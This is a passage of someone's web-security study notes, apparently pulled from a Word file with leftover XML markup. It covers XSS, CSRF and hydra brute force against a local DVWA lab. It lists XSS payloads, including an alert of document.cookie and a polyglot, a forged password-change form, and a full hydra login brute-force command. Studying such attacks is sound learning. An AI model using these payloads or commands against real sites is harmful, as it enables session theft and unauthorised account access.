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Day-14 (29/12/2019)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Cross site Scripting (XSS):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&lt;script&gt;alert("sss is xss")&lt;/script&gt;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&lt;img src=x onerror=alert("Its me again")&gt;&lt;/img&gt;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https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot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http://www.jsfuck.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to execute code.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https://xss-game.appspot.com/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https://www.woodlandworldwide.com/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&lt;script&gt;alert("sss")&lt;/script&gt;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XSS Stores - Upload img using changing max length term in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&lt;script&gt;alert(document.cookie);&lt;/script&gt;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security=low; PHPSESSID=e3d7cb60a137555213a685ed19c83900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Unique to each user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 Stealer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cross site scripting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&lt;script&gt;alert("amreet loves xss")&lt;/script&gt;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&lt;img src=x onerror=alert("gotcha!")&gt;&lt;/img&gt;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jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e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jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e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&lt;script&gt;alert("amreet")&lt;/script&gt;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&lt;img src=https://img1.looper.com/img/gallery/new-batman-theory-is-taking-the-internet-for-a-spin/intro-1573506972.jpg&gt;&lt;/img&gt;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&lt;script&gt;alert(document.cookie);&lt;/script&gt;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Cross-Site Request Forgery (CSRF):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&lt;form action="http://192.168.0.124/dvwa/vulnerabilities/csrf/" method="GET"&gt; New password:&lt;br&gt;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&lt;input type="password" AUTOCOMPLETE="on" name="password_new" value="abc"&gt;&lt;br&gt;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new password: &lt;br&gt;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&lt;input type="password" AUTOCOMPLETE="on" name="password_conf" value="abc"&gt;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&lt;input type="submit" value="Change" name="Change"&gt;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CORS - Cross-origin resource sharing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- Same origin Policy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https://www.youtube.com/watch?v=-UMcCwfvEEY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 csrf token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https://pentester.land/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web-hacking-101.pdf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web application hacker's handbook 2nd edition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http://index-of.es/EBooks/11_TheWeb%20Application%20Hackers%20Handbook.pdf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Brute force on web forms(using hydra):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hydra -v -V -s 80 -L /root/Desktop/dictionary.txt -P /root/Desktop/dictionary.txt 192.168.0.124 http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&amp;password=^PASS^&amp;Login=Login:incorrect:H=Cookie: security=low; PHPSESSID=18c5fd705d67c0611c9749b3bc9cb95f"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entester.land/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=-UMcCwfvEEY" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://index-of.es/EBooks/11_TheWeb%20Application%20Hackers%20Handbook.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.woodlandworldwi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0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jsfuck.com/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xss-gam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